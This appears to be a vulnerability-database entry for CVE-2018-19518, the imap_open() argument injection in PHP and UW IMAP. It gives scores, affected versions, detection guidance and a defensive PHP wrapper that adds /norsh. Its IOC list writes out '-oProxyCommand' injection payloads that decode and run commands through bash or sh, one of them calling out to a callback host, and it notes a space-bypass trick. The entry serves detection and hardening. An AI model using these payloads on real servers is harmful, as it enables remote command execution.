CVE-2018-19518
published 2018-11-25

CVE-2018-19518: University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap…

Priority: P187 (high) · CVSS 3.1 base score: 7.5
Vector: AV:N / AC:H / PR:L / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Ransomware · Initial access
Exploited in the wild
EPSS: 95.23% (99.9th percentile)
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.

Affected

13 ranges
Vendor            Product        Version range                          Fixed in
canonical         ubuntu_linux
canonical         ubuntu_linux
canonical         ubuntu_linux
debian            debian_linux
debian            debian_linux
debian            uw-imap        < uw-imap 8:2007f~dfsg-6 (bookworm)    uw-imap 8:2007f~dfsg-6 (bookworm)
php               php            5.6.0 – 5.6.38
php               php            7.0.0 – 7.0.32
php               php            7.1.0 – 7.1.24
php               php            7.2.0 – 7.2.12
uw-imap_project   uw-imap
uw-imap_project   uw-imap        >= 0 < 8:2007f~dfsg-6                  8:2007f~dfsg-6
uw-imap_project   uw-imap        >= 0 < 8:2007f~dfsg-6                  8:2007f~dfsg-6

Detection & IOCs (extracted from sources)

command: -oProxyCommand=`echo <base64_payload>|base64 -d|bash`
command: x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}
port: 143
  • Look for IMAP server name fields (e.g., PS_SAV_IMAP_URL, server_url) in POST requests containing '-oProxyCommand' — this is the core injection vector passed to rsh/ssh.
  • Monitor for imap_open() calls in PHP where the mailbox/server parameter is user-controlled and does not include the /norsh flag, as this enables the rsh/ssh ProxyCommand injection path.
  • Detect POST requests to PrestaShop AdminCustomerThreads controller with a PS_SAV_IMAP_URL field value starting with 'x ' followed by '-oProxyCommand'.
  • Detect POST requests to SuiteCRM InboundEmail Save action with a server_url field value starting with 'x ' followed by '-oProxyCommand'.
  • Alert on spawned ssh/rsh child processes from a PHP/web-server process (e.g., apache, nginx, php-fpm) with arguments containing 'ProxyCommand', indicating successful exploitation.
  • In fuzzing/DAST scanning, inject the payload into HTTP query parameters and match for outbound HTTP callbacks (curl User-Agent) to confirm blind RCE via OAST.
  • The vulnerability is only exploitable on systems where rsh is symlinked or mapped to ssh (common on Debian/Ubuntu), enabling the -oProxyCommand argument injection. Systems where rsh is the traditional rsh binary are not exploitable via this vector.
  • PHP installations using imap_open() with the /norsh flag are not vulnerable, as the flag prevents the rsh preauthentication path from being invoked.
  • Red Hat Enterprise Linux 7 and 8 are listed as 'Not affected', so detection rules targeting RHEL 7/8 environments may produce false positives or be irrelevant.
  • The payload must avoid spaces; the Metasploit module substitutes spaces with $IFS$() to bypass shell argument parsing restrictions.
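A hardened wrapper for the imap_open() path discussed in the notes above, added here as an illustration; it is not code from this page, from PHP or from the UW IMAP project. It refuses any server value that is not a bare hostname or IPv4 literal (so a value such as "x -oProxyCommand=..." never reaches rsh/ssh), assembles the mailbox string itself, and always appends the documented /norsh flag so the rsh preauthentication path is not taken even if the host check were somehow bypassed. The function names build_safe_mailbox and safe_imap_open, the folder allow-list and the constructed sample inputs are assumptions of this example; only imap_open(), OP_READONLY, imap_last_error() and the /norsh mailbox flag are PHP's own.

```php
<?php
// Added example (not from the page or the PHP project): defensive wrapper for
// imap_open() against the CVE-2018-19518 argument-injection path.
// Function names, folder allow-list and sample inputs are hypothetical.

/**
 * Build a mailbox spec from an untrusted host name.
 * Rejects anything that is not a plain hostname or IPv4 literal and
 * always disables rsh/ssh preauthentication with /norsh.
 */
function build_safe_mailbox(string $host, int $port, string $folder = 'INBOX', bool $ssl = true): string
{
    // Hostname: DNS-label characters only, no leading or trailing hyphen,
    // no whitespace. A leading "-" is exactly what an rsh/ssh option needs,
    // so it is refused outright.
    $is_host = (bool) preg_match('/^(?!-)[A-Za-z0-9.-]{1,253}(?<!-)$/', $host);
    $is_ipv4 = filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
    if (!$is_host && !$is_ipv4) {
        throw new InvalidArgumentException('IMAP host must be a hostname or IPv4 address');
    }
    if ($port < 1 || $port > 65535) {
        throw new InvalidArgumentException('IMAP port out of range');
    }
    // Folder names come from an application allow-list, never from the request.
    if (!in_array($folder, ['INBOX', 'Sent', 'Drafts'], true)) {
        throw new InvalidArgumentException('Unknown folder');
    }
    // /norsh: do not use rsh or ssh to establish a preauthenticated session.
    $flags = '/imap' . ($ssl ? '/ssl' : '') . '/norsh';
    return sprintf('{%s:%d%s}%s', $host, $port, $flags, $folder);
}

/**
 * Open the mailbox read-only; the untrusted host is validated first.
 */
function safe_imap_open(string $host, int $port, string $user, string $password)
{
    $mailbox = build_safe_mailbox($host, $port);
    $stream  = @imap_open($mailbox, $user, $password, OP_READONLY, 1);
    if ($stream === false) {
        throw new RuntimeException('IMAP connect failed: ' . imap_last_error());
    }
    return $stream;
}

// Constructed inputs for demonstration; the rejection case needs no network.
$injected = 'x -oProxyCommand=example';   // same shape as the IOC entries above
try {
    build_safe_mailbox($injected, 143);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . PHP_EOL;
}
echo build_safe_mailbox('imap.example.com', 993) . PHP_EOL;
```

The host check and the /norsh flag are independent layers: the regex stops option-looking strings at the web tier, and /norsh removes the rsh/ssh preauthentication code path in c-client entirely, which is the property the "not vulnerable" note above relies on. Folder names and ports are taken from application configuration rather than the request so that no other part of the mailbox string is attacker-controlled.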

CVSS provenance

nvd v3.1: 7.5 HIGH (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)
nvd v2.0: 8.5 HIGH (AV:N/AC:M/Au:S/C:C/I:C/A:C)
osv: 7.5 HIGH
vulncheck: 7.5 HIGH
vendor_debian: 7.5 HIGH
vendor_redhat: 7.5 HIGH